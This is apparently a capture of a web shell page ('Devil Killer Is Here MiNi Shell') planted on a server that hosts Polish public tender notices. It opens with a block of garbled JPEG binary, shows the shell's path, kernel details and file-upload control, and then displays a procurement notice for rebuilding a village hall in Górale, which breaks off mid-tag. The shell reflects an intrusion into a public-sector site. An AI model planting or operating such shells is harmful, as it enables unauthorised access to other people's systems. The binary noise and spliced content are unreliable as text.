JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20221230/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20221230/0052542201-N-2022.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa pomieszczeń świetlicy wiejskiej w miejscowości Górale </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO I GMINA JABŁONOWO POMORSKIE</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 871118431</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Główna 28</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Jabłonowo Pomorskie</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">87-330</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL616 - Grudziądzki</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">566976800</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">566979001</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia.publiczne@jablonowopomorskie.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.jablonowopomorskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa pomieszczeń świetlicy wiejskiej w miejscowości Górale </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-15b73a0a-881a-11ed-b4ea-f64d350121d2</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2022/BZP 00525422</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2022-12-30</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00016447/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Przebudowa świetlicy wiejskiej w miejscowości Górale</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> PROW </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/710809 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/710809<br/><br/>Środkiem komunikacji elektronicznej, w postępowaniu, jest platforma zakupowa, zwana dalej „Platformą”, dostępna pod adresem<br/>https://platformazakupowa.pl oraz formularz (moduł) „Wyślij wiadomość do zamawiającego” (dostępny na stronie postępowania).<br/>Uwaga - Formularz (moduł) „Wyślij wiadomość do zamawiającego” nie służy do składania ofert.<br/>Komunikacja za pośrednictwem poczty elektronicznej na/z adres/-u zamowienia.publiczne@jablonowopomorskie.pl jest<br/>dopuszczalna w wyjątkowych sytuacjach np. w przypadku problemów technicznych związanych z funkcjonowaniem Platformy, w tym<br/>prac serwisowych, awarii, itp. Uwaga komunikacja za pośrednictwem poczty elektronicznej nie dotyczy składania ofert.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów<br/>lub oświadczeń między zamawiającym a wykonawcą odbywa się zgodnie z art. 61 ust. 1 PZP.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">:Szczegółowe wymagania techniczne i<br/>organizacyjne zostały opisane w „Regulaminie platformazakupowa.pl” (dostępnym pod adresem<br/>https://platformazakupowa.pl/strona/1-regulamin), który jest uzupełnieniem „Instrukcji dla wykonawców platformazakupowa.pl” .<br/>Założenie lub posiadanie na Platformie konta użytkownika jest równoznaczne z akceptacją przez wykonawcę warunków aktualnego<br/>regulaminu Platformy.<br/>Szczegółowe instrukcje korzystania z Platformy, w tym instrukcja składania ofert znajdują się pod adresem<br/>https://platformazakupowa.pl/strona/45-instrukcje .<br/>W przypadku pytań dot. zasad korzystania z Platformy, prosimy o skorzystanie z pomocy Centrum Wsparcia Klienta (CWK), które<br/>udziela informacji związanych z: procesem składania ofert, rejestracji oraz innych aspektów technicznych Platformy. CWK dostępne<br/>jest codziennie od poniedziałku do piątku w godz. od 8.00 do 17.00 pod nr tel. +48221010202 lub cwk@platformazakupowa.pl , z<br/>zastrzeżeniem harmonogramu pracy dostępnym pod adresem https://platformazakupowa.pl/strona/40-kontakt .<br/>Wykonawca jest zobowiązany do sporządzania dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub<br/>oświadczeń zgodnie z Rozporządzeniem Prezesa Rady Ministrów z dnia 30.12.2020 r. w sprawie sposobu sporządzania i<br/>przekazywania informacji oraz wymagań technicznych dla dokumentów elektronicznych oraz środków komunikacji elektronicznej w<br/>postępowaniu o udzielenie zamówienia publicznego lub konkursie.<br/>Zaleca się wykonawcom założenie bezpłatnego konta użytkownika na Platformie. W przeciwnym wypadku wykonawca będzie miał<br/>ograniczone funkcjonalności Platformy np. nie będzie widział wiadomości prywatnych od zamawiającego lub wycofania oferty bez<br/>kontaktu z CWK.<br/>Zamawiający dopuszcza przesyłanie danych w formatach dopuszczonych w Rozporządzeniu Rady Ministrów z dnia 12.04.2012 r. w<br/>sprawie Krajowych Ram Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (tekst jedn. Dz. U. z 2017 r. poz. 2247), tj. m.in. .doc,<br/>.odt, .docx, .txt, .xls, .xlsx, .xml, .ppt, .pdf, .jpg, .zip, .7Z.<br/>Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg ze szczególnym wskazaniem na .pdf, zaś w celu ewentualnej<br/>kompresji danych zamawiający rekomenduje .zip lub .7Z .<br/>Minimalne wymagania sprzętowo-aplikacyjne umożliwiające udział w niniejszym postępowaniu, w tym korzystanie z Platformy:<br/>a) komputer klasy PC lub MAC o konfiguracji: pamięć min. 2 GB Ram, procesor Intel IV 2 GHZ lub jego nowsza wersja, jeden z<br/>systemów operacyjnych – MS Windows 7, Mac Os x 10 4, Linux, lub ich nowsze wersje,<br/>b) łącze internetowe o przepustowości co najmniej 256 kbit/s,<br/>c) posiadanie aktywnego konta poczty elektronicznej (e-mail),<br/>d) zainstalowana przeglądarka internetowa inna niż Internet Explorer, preferowane: EDGE, Chrome lub FireFox w najnowszej<br/>dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki typu „cookies”,<br/>e) zainstalowany program Adobe Acrobat Reader lub inny obsługujący format plików .pdf,<br/>f) Platforma działa według standardu przyjętego w komunikacji sieciowej – kodowanie UTF8,<br/>g) szyfrowanie na platformazakupowa.pl odbywa się za pomocą protokołu TLS 1.3.,<br/>h) posiadanie ważnego (aktualnie obowiązującego): kwalifikowanego podpisu elektronicznego do podpisywania plików w formie<br/>elektronicznej lub podpisu zaufanego lub podpisu osobistego do podpisywania plików w postaci elektronicznej,<br/>i) strona platformazakupowa.pl jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768 pikseli,<br/>j) oznaczenie czasu odbioru danych przez platformę zakupową stanowi datę oraz dokładny czas (hh:mm:ss) generowany według<br/>czasu lokalnego serwera synchronizowanego z zegarem Głównego Urzędu Miar.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://platformazakupowa.pl/transakcja/710809</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">: Zgodnie z art. 13 ust. 1 i ust. 2 oraz art. 14 ust. 1 i ust. 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z 27.04.2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych<br/>osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o<br/>ochronie danych), zwane dalej „RODO” informuje się, że:<br/>1) administratorem danych osobowych jest Burmistrz Miasta i Gminy Jabłonowo Pomorskie, (dane kontaktowe Urząd Miasta i Gminy<br/>Jabłonowo Pomorskie, ul. Główna 28, 87-330 Jabłonowo Pomorskie).<br/>2) Wyznaczono inspektora ochrony danych, z którym można się kontaktować pisemnie na adres: Urząd Miasta i Gminy Jabłonowo<br/>Pomorskie, ul. Główna 28, 87-330 Jabłonowo Pomorskie lub iodo@jablonowopomorskie.pl .<br/>3) Pani / Pana dane będą przetwarzane w oparciu o art. 6 ust. 1 lit. c RODO (Dz.Urz.UE.L.2016.119 z 04.05.2016 r. ze zm.) w celu<br/>związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego prowadzonego na podstawie ustawy z dnia<br/>11.09.2019 r. Prawo zamówień publicznych.<br/>4) Odbiorcami Pani / Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania<br/>w oparciu o przepisy ustawy z dnia 11.09.2019 r. Prawo zamówień publicznych (art. 18, art. 74), jak również inne podmioty<br/>upoważnione do odbioru danych osobowych na podstawie przepisów prawa lub zawartych z Administratorem umów, w tym<br/>podmioty zajmujące się obsługą informatyczną Administratora.<br/>5) Dane po zrealizowaniu celu, dla którego zostały zebrane, będą przetwarzane do celów archiwalnych i przechowywane przez<br/>okres niezbędny do zrealizowania przepisów dotyczących archiwizowania danych obowiązujących u Administratora lub okresu<br/>trwałości projektu w przypadku otrzymania dofinansowania ze środków zewnętrznych.<br/>6) Zamawiający informuje, że będzie przetwarzał dane osobowe w zakresie wskazanym w otrzymanej ofercie, dokumentach<br/>składanych przez wykonawcę oraz w publicznie dostępnych rejestrach i bazach danych np. CEIDG, KRS (art. 14 ust. 1 lit. d, art. 14<br/>ust. 2 lit. f).<br/>7) Posiada Pani/Pan:<br/>a) na podstawie art. 15 RODO, prawo dostępu do danych osobowych Pani/Pana dotyczących,<br/>b) na podstawie art. 16 RODO, prawo do sprostowania Pani/Pana danych osobowych, które są nieprawidłowe oraz prawo do<br/>uzupełnienia Pani/Pana danych osobowych, które są niekompletne. Skorzystanie przez osobę, której dane osobowe dotyczą, z<br/>uprawnienia do sprostowania lub uzupełnienia, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o<br/>udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia publicznego w zakresie niezgodnym z ustawą oraz<br/>nie może naruszać integralności protokołu postępowania oraz jego załączników,<br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO. Prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do<br/>przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub<br/>prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego,<br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych (na adres Urzędu Ochrony Danych Osobowych, ul.<br/>Stawki 2, 00-193 Warszawa), gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy<br/>RODO.<br/>8) Obowiązek podania przez Panią / Pana danych osobowych Zamawiającemu jest wymogiem związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego.<br/>9) Dane osobowe nie będą przetwarzane w sposób opierający się na zautomatyzowanym przetwarzaniu. Decyzje nie będą<br/>podejmowane w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Nie przysługuje Pani / Panu:<br/>a) prawo do przenoszenia danych osobowych,<br/>b) prawo do wycofania zgody na przetwarzanie danych osobowych,<br/>c) prawo do wniesienia sprzeciwu wobec przetwarzania danych,<br/>d) prawo do usunięcia danych osobowych, przed okresem o którym mowa w Rozdziale I ust. 10 pkt 5 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">IIPP.271.1.10.2022</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem zamówienia jest przebudowa pomieszczeń świetlicy wiejskiej w miejscowości Górale. Lokalizacja robót: województwo Kujawsko-Pomorskie, powiat brodnicki, gmina Jabłonowo Pomorskie (jednostka ewidencyjna: 040207_5 Jabłonowo Pomorskie), miejscowość Górale, obręb ewidencyjny 0007 Górale, działka nr 108/1.<br/>2.	Obiekt budowlany stanowiący budynek świetlicy wiejskiej wraz z niezbędną infrastrukturą w miejscowości Górale projektuje się jako budynek wolnostojący niepodpiwniczony z dachem płaskim.<br/>3.	Projektowane parametry techniczne przedmiotu zamówienia, w tym zestawienie powierzchni:<br/>1)	powierzchnia zabudowy - 333,00 m ²<br/>2)	powierzchnia działki nr 108/1 – 5900,00 m ²<br/>3)	powierzchnia użytkowa - 185,87 m ²<br/>4)	kubatura - 717,00 m ³<br/>5)	wysokość budynku do kalenicy – bez zmian<br/>6)	wysokość okapu budynku – bez zmian<br/>7)	długość budynku – 23,26 m<br/>8)	szerokość budynku – 19,40 m<br/>9)	liczba kondygnacji – 1<br/>10)	powierzchnia projektowanych terenów zielonych– 4975,96 m 2,<br/>11)	powierzchnia proj. tarasu, schodów i pochylni 25,0+21+5,02= 51,02m2,<br/>12)	powierzchnia projektowanych terenów utwardzonych – 540,02 m2.<br/>4.	Na parterze budynku zaprojektowano: hol wejściowy z szatnią, sala główna, WC dla niepełnosprawnych, WC damskie, WC męskie, komunikacja, zaplecze kuchenne, zaplecze /catering, magazynek, WC personelu, pomieszczenie gospodarcze.<br/>6.	Zakres prac będzie obejmował wykonanie m.in.:<br/>1)	Roboty rozbiórkowe zewnętrzne:<br/>a)	rozebranie rynien <br/>b)	rozebranie rur spustowych,<br/>c)	rozebranie obróbek blacharskich ,<br/>d)	rozebranie krat stalowych,<br/>e)	rozebranie posadzek z płytek,<br/>f)	wywiezienie gruzu.<br/>2)	Roboty rozbiórkowe wewnętrzne:<br/>a)	wykucie otworów w ścianach,<br/>b)	rozebranie posadzek z płytek, desek i legarów, <br/>c)	wykucie ościeżnic,<br/>d) rozebranie ścianek z cegieł i okładzin z płytek,<br/>e)	demontaż baterii, pisuaru, muszli sedesowych, grzejników.<br/>3)	Wzmocnienie konstrukcji drewnianej dachu .<br/>4)	Projektowane pokrycie dachu niewentylowanego: <br/>a) podmurowanie ogniomurów, <br/>b) wykonanie izolacji termicznej z styropianu o gr 25 cm,<br/>c) montaż papy podkładowej i wierzchniego krycia,<br/>d) montaż nowych rynien i rur spustowych .<br/>5)	Projektowane docieplenie ścian poniżej gruntu,<br/>a)	wykonanie wykopów,<br/>b)	oczyszczenie ścian,<br/>c)	montaż izolacji przeciwwilgociowych i termicznych,<br/>d)	zasypanie i zagęszczenie wykopów,<br/>e)	wykonanie opaski z kostki betonowej gr. 6 cm .<br/>6)	Projektowane docieplenie ścian powyżej gruntu<br/>a) montaż rusztowań,<br/>b) oczyszczenie elewacji,<br/>c) ocieplenie elewacji w technologii lekkiej mokrej styropianem gr. 18 cm,<br/>d) wykonanie wyprawy tynkarskich i malarskich .<br/>7)	Projektowane schody i pochylnie zewnętrzne:<br/>a)	wykonanie nowych schodów zewnętrznych wraz z tarasem o pow. 25 m2, <br/>b)	wykonanie pochylni dla osób niepełnosprawnych,<br/>c)	montaż balustrad .<br/>8)	Stolarka okienna i drzwiowa: <br/>a)	wymiana stolarki okiennej i drzwiowej zewnętrznej,<br/>b)	montaż okna podawczego,<br/>c)	montaż stolarki drzwiowej wewnętrznej. <br/>9)	Projektowane roboty wewnętrzne:<br/>a)	posadzki - wykonanie podkładu pod posadzki, <br/>b)	wykonanie izolacji z papy podkładowej termozgrzewalnej,<br/>c)	wykonanie izolacji termicznej z styropianu gr. 10 cm,<br/>d)	montaż płytek posadzkowych.<br/>10)	Projektowane roboty wewnętrzne:<br/>a)	ściany i sufity<br/>b)	wykonanie ścianek działowych murowanych,<br/>c)	wykonanie tynków na ścianach,<br/>d)	wykonanie sufitów podwieszonych a płyt gipsowo kartonowych,<br/>e)	wykonanie sufitów kasetonowych, <br/>f)	oczyszczenie i zmycie ścian,<br/>g)	wykonanie gładzi gipsowych na ścianach i sufitach,<br/>h)	wykonanie robót malarskich.<br/>11)	pozostałych prac, które zostały ujęte w dokumentacji technicznej, stanowiącej załącznik nr 1 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45262522-6 - Roboty murarskie</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45111200-0 - Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne</p> <p class="mb-0">45111100-9 - Roboty w zakresie burzenia</p> <p class="mb-0">45421000-4 - Roboty w zakresie stolarki budowlanej</p> <p class="mb-0">45442100-8 - Roboty malarskie</p> <p class="mb-0">45321000-3 - Izolacja cieplna</p> <p class="mb-0">45262300-4 - Betonowanie</p> <p class="mb-0">45430000-0 - Pokrywanie podłóg i ścian</p> <p class="mb-0">45111300-1 - Roboty rozbiórkowe</p> <p class="mb-0">45320000-6 - Roboty izolacyjne</p> <p class="mb-0">45260000-7 - Roboty w zakresie wykonywania pokryć i konstrukcji dachowych i inne podobne roboty specjalistycze</p> <p class="mb-0">45410000-4 - Tynkowanie</p> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45311000-0 - Roboty w zakresie okablowania oraz instalacji elektrycznych</p> <p class="mb-0">09332000-5 - Instalacje słoneczne</p> <p class="mb-0">45312310-3 - Ochrona odgromowa</p> <p class="mb-0">45300000-0 - Roboty instalacyjne w budynkach</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <p class="mb-0">45331000-6 - Instalowanie urządzeń grzewczych, wentylacyjnych i klimatyzacyjnych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">3 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Przy wyborze oferty Zamawiający będzie kierował się następującymi kryteriami oceny ofert:<br/>1) Cena (C) – waga 60,00 punktów<br/>2) Okres rękojmi (R) – waga 40,00 punktów.<br/>2. Za najkorzystniejszą ofertę zostanie uznana oferta, która uzyska najwyższą łączną liczbę punktów za wszystkie kryteria oceny<br/>ofert wg wzoru</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres rękojmi</span></h3> <h3 